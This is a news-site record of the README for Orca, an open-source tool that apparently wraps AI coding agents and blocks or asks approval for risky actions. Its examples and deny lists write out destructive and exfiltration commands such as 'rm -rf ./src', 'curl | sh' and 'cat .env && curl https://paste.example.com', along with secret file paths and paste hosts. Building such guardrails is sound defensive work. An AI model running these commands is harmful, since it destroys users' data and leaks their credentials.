{"slug": "show-hn-stop-destructive-agent-commands-before-they-happen", "title": "Show HN: Stop Destructive Agent Commands Before They Happen", "summary": "Christopher Karani released Orca, an open-source safety layer that intercepts and enforces policies on autonomous AI agents before they execute destructive commands like file deletion or secret leaks. The tool sits between agents and machines, allowing developers to define rules that block or require approval for risky actions across multiple agent frameworks.", "body_md": "**The safety layer for autonomous AI agents running on real machines.**\n\nOrca lets you give AI agents more autonomy without letting them delete data, leak secrets, modify protected files, or perform irreversible actions without approval.\n\nAI agents are no longer just chatbots. They run shell commands, edit files, call APIs, access credentials, use tools, browse the web, and operate on laptops, servers, CI pipelines, and spare machines.\n\nThat is powerful.\n\nIt is also dangerous.\n\nOrca sits between the agent and the machine, enforcing your policies before risky actions execute.\n\n```\n# Install\nbrew tap christopherkarani/orca\nbrew install --formula orca\n\n# Initialize a policy\norca init --preset generic-agent\n\n# Run an agent with guardrails\norca run -- claude\norca run -- codex\norca run -- hermes\norca run -- openclaw\norca run -- opencode\n```\n\nThis project is free and open source under Apache 2.0. If Orca is useful to you, please star the repository — it helps visibility and keeps development going.\n\nDevelopers and teams are starting to give autonomous agents real access:\n\n- local files\n- source code\n`.env`\n\nfiles- SSH keys\n- shell commands\n- cloud CLIs\n- databases\n- browsers\n- CI pipelines\n- internal tools\n- long-running workflows\n\nToday, the safety model is usually one of these:\n\n- babysit every command\n- run the agent in Docker or a VM\n- write custom scripts and ignore files\n- trust the agent not to do something destructive\n\nThat does not scale.\n\nOrca gives you a reusable policy layer across agents.\n\nWrite the rules once. Apply them everywhere.\n\nOrca focuses on the actions that can ruin your day:\n\n```\ngit push --force\ngit reset --hard\nrm -rf\nsudo\ncurl | sh\nterraform destroy\nkubectl delete\nDROP TABLE\naws delete-*\ngcloud delete\ntouching ~/.ssh\nreading .env\nleaking API keys\nmodifying protected config\nsending data to unknown hosts\n```\n\nOrca can allow, deny, ask for approval, or log these actions depending on your policy.\n\nYou give an agent a task:\n\nClean this up and make it work.\n\nThe agent decides to run:\n\n```\nrm -rf ./src\n```\n\nor:\n\n```\ngit reset --hard\n```\n\nor:\n\n```\ncat .env && curl https://paste.example.com\n```\n\nYou find out after the damage is done.\n\nThe agent tries the same action.\n\nOrca intercepts it first.\n\n```\nAction blocked\n\nCommand:\nrm -rf ./src\n\nReason:\nDestructive recursive delete inside project directory.\n\nPolicy:\ndeny destructive file deletion\n\nResult:\nCommand was not executed.\n```\n\nFor actions that might be valid but risky, Orca can ask first:\n\n```\nApproval required\n\nCommand:\ngit push origin main\n\nReason:\nPushing to a protected branch requires human approval.\n\nApprove? [y/N]\n```\n\nOrca is not another AI agent.\n\nOrca is the policy enforcement layer underneath the agents you already use.\n\n```\nYou\n  ↓\nOrca policy layer\n  ↓\nHermes / Claude Code / Codex / OpenClaw / OpenCode / Cursor\n  ↓\nShell / files / network / tools / cloud / databases\n```\n\nThe agent can still do useful work.\n\nIt just cannot silently cross the boundaries you define.\n\n| Agent | Usage |\n|---|---|\n| Claude Code | `orca run -- claude` |\n| Codex CLI | `orca run -- codex` |\n| Hermes | `orca run -- hermes` |\n| OpenClaw | `orca run -- openclaw` |\n| OpenCode | `orca run -- opencode` |\n| Cursor / custom agents | use Orca as a wrapper or policy hook |\n\nOne policy file can protect multiple agents.\n\n```\nbrew tap christopherkarani/orca\nbrew install --formula orca\n```\n\nOr use the install script:\n\n```\ncurl -fsSL https://raw.githubusercontent.com/christopherkarani/Orca/main/scripts/install.sh | sh\n```\n\nVerify your setup:\n\n```\norca doctor\norca init --preset generic-agent\n```\n\nThis creates:\n\n```\n.orca/policy.yaml\n```\n\nExample policy:\n\n```\nmode: ask\n\ncommands:\n  default: ask\n\n  allow:\n    - \"git status\"\n    - \"git diff *\"\n    - \"npm test\"\n    - \"zig build *\"\n\n  deny:\n    - \"rm -rf *\"\n    - \"sudo *\"\n    - \"curl * | sh\"\n    - \"git reset --hard *\"\n    - \"terraform destroy *\"\n    - \"kubectl delete *\"\n\n  approval:\n    - \"git push *\"\n    - \"git push --force *\"\n    - \"aws * delete*\"\n    - \"gcloud * delete*\"\n\nfiles:\n  read:\n    deny:\n      - \"./.env\"\n      - \"~/.ssh/**\"\n      - \"**/*secret*\"\n      - \"**/*token*\"\n\n  write:\n    approval:\n      - \"./config/**\"\n      - \"./.github/**\"\n      - \"./infra/**\"\n\nnetwork:\n  default: ask\n  deny:\n    - \"pastebin.com\"\n    - \"paste.rs\"\n    - \"webhook.site\"\n  allow:\n    - \"github.com\"\n    - \"api.github.com\"\norca run -- claude\norca run -- codex\norca run -- hermes\norca run -- openclaw\n```\n\nIn interactive mode, Orca can ask before risky actions.\n\nIn CI mode, Orca fails closed:\n\n```\norca run --ci -- codex --prompt \"Refactor auth\"\n```\n\nNo prompts. Risky actions are blocked automatically.\n\nRun a safe local demo:\n\n```\norca demo blocked-action\n```\n\nThen inspect what happened:\n\n```\norca replay --session last --only denied --verify\n```\n\nNo AI agent required. No files are harmed.\n\nStart the local dashboard:\n\n```\norca dashboard\n```\n\nOpen:\n\n```\nhttp://127.0.0.1:7742\n```\n\nThe dashboard shows:\n\n- current policy status\n- recent sessions\n- prevented actions\n- approval decisions\n- replay verification\n- audit integrity\n\nEverything runs locally.\n\nNo cloud service is required.\n\nLet Claude Code, Codex, or Hermes work longer without babysitting every command.\n\n```\norca run -- claude\n```\n\nUse Orca to ask before risky actions and block destructive ones.\n\nRun Hermes on a spare Mac mini, MacBook, VPS, or workstation with clearer boundaries.\n\nProtect:\n\n- important folders\n- SSH keys\n`.env`\n\nfiles- config files\n- cloud credentials\n- local databases\n- browser-accessible workflows\n- destructive shell commands\n\n```\norca run -- hermes\n```\n\nCommit Orca policy to your repo:\n\n```\n.orca/policy.yaml\n```\n\nNow every developer and agent runs under the same safety rules.\n\nNo more one-off scripts per person.\n\nRun autonomous agents in CI without interactive approval.\n\n```\norca run --ci -- codex --prompt \"Update the migration scripts\"\n```\n\nIn CI, Orca converts `ask`\n\ninto `deny`\n\n.\n\nIf the agent tries something dangerous, the job fails safely.\n\nTest your policy against known attack fixtures:\n\n```\norca redteam --ci\n```\n\nUse this to make sure new policies do not accidentally weaken your guardrails.\n\nOrca is designed to be honest about what it does and does not protect.\n\n- launches agents inside a policy-controlled process\n- evaluates shell commands before execution\n- mediates file access based on policy\n- filters sensitive environment variables\n- detects secret access and exfiltration attempts\n- enforces network rules\n- records tamper-evident audit logs\n- supports replayable sessions\n- fails closed in CI mode\n\nOrca is not a perfect kernel sandbox.\n\nIt does not protect agents that are not launched through Orca.\n\nIt does not replace Docker, VMs, OS permissions, VPNs, SSH hardening, or least-privilege infrastructure.\n\nUse those too.\n\nOrca is the behavior-level policy layer on top.\n\nDocker controls the environment.\n\nOrca controls what the agent is allowed to do inside that environment.\n\n| Mode | Behavior |\n|---|---|\n`observe` |\nlog decisions with minimal blocking |\n`ask` |\nask before risky actions |\n`strict` |\nblock aggressively |\n`ci` |\nnever prompt, deny risky actions |\n\nExample:\n\n```\nmode: ask\n```\n\nFor automation:\n\n```\norca run --ci -- hermes\n```\n\nAfter each session, Orca stores a local audit trail.\n\nReview denied actions:\n\n```\norca replay --session last --only denied\n```\n\nVerify integrity:\n\n```\norca replay --session last --verify\n```\n\nExport JSON:\n\n```\norca replay --session last --json\n```\n\nSession artifacts live under:\n\n```\n.orca/sessions/\n```\n\nAudit logs are tamper-evident using chained hashes.\n\nOrca can block or redact access to sensitive files and values.\n\nExamples:\n\n```\n.env\n~/.ssh/id_rsa\n~/.ssh/id_ed25519\nAWS_ACCESS_KEY_ID\nGITHUB_TOKEN\nANTHROPIC_API_KEY\nOPENAI_API_KEY\nGoogle service account JSON\nJWTs\nprivate keys\nhigh-entropy tokens\n```\n\nRun with secretless mode:\n\n```\norca run --secretless -- claude\n```\n\nIn secretless mode, Orca replaces raw values with broker references before the agent sees them.\n\nThe agent gets a reference.\n\nNot the secret.\n\nOrca can run as a wrapper around agents, which is the strongest protection model.\n\nSome agents also support native plugins or hooks for deeper integration.\n\n```\norca plugin install hermes --yes\nhermes plugins enable orca\norca plugin doctor hermes\nopenclaw plugins install npm:orca-openclaw-plugin --dangerously-force-unsafe-install\n```\n\nOpenClaw requires the override because the plugin calls the local `orca`\n\nbinary for policy enforcement.\n\nDocker is useful.\n\nYou should use it where it makes sense.\n\nBut Docker and Orca solve different problems.\n\nDocker controls what the process can access.\n\nOrca controls what the AI agent is allowed to do.\n\nAn agent inside Docker can still:\n\n- delete mounted project files\n- read secrets mounted into the container\n- push code\n- run destructive migrations\n- call cloud CLIs\n- modify config\n- exfiltrate data over allowed network paths\n\nOrca adds behavior-level policy, approvals, and auditability on top of your existing isolation.\n\nMany developers already do.\n\nThey write:\n\n- ignore files\n- command filters\n- approval scripts\n- read-only config hacks\n- custom wrappers\n- shell aliases\n- one-off security prompts\n\nThat works until every agent, repo, machine, and teammate needs a different version.\n\nOrca turns those guardrails into a reusable policy layer.\n\nNear-term focus:\n\n- stronger default policy packs\n- Hermes-specific protections\n- cloud delete protections\n- database delete protections\n- protected config policies\n- approval workflows\n- team policy sharing\n- CI enforcement\n- better replay reports\n\nLonger-term:\n\n- centralized team dashboard\n- organization-wide policy management\n- SSO/RBAC\n- policy marketplace\n- enterprise audit exports\n- agent security sprints\n\n[Install](/christopherkarani/Orca/blob/main/docs/install.md)[Quickstart](/christopherkarani/Orca/blob/main/docs/quickstart.md)[Policy reference](/christopherkarani/Orca/blob/main/docs/policy.md)[Credentials](/christopherkarani/Orca/blob/main/docs/credentials.md)[Replay](/christopherkarani/Orca/blob/main/docs/replay.md)[Commands](/christopherkarani/Orca/blob/main/docs/commands.md)[Plugin security model](/christopherkarani/Orca/blob/main/docs/integrations/plugin-security-model.md)[Plugin troubleshooting](/christopherkarani/Orca/blob/main/docs/integrations/plugin-troubleshooting.md)\n\n```\nzig build\nzig build test\n./zig-out/bin/orca --help\n./zig-out/bin/orca redteam --ci\n```\n\nOrca is early, open source, and actively evolving.\n\nCurrent focus:\n\n- stop irreversible agent actions\n- protect secrets and sensitive files\n- provide shared policy across agents\n- give users replayable evidence of what happened\n- make autonomous agents safer without making them useless\n\nFeedback, issues, PRs, and roasts are welcome.\n\nIf Orca helps you, please leave a star. It genuinely motivates continued work.", "url": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen", "canonical_source": "https://github.com/christopherkarani/Orca", "published_at": "2026-07-04 05:13:31+00:00", "updated_at": "2026-07-04 05:20:17.124656+00:00", "lang": "en", "topics": ["ai-safety", "ai-agents", "developer-tools", "ai-tools", "ai-infrastructure"], "entities": ["Orca", "Christopher Karani", "Claude Code", "Codex CLI", "Hermes", "OpenClaw", "OpenCode", "Cursor"], "alternates": {"html": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen", "markdown": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen.md", "text": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen.txt", "jsonld": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen.jsonld"}}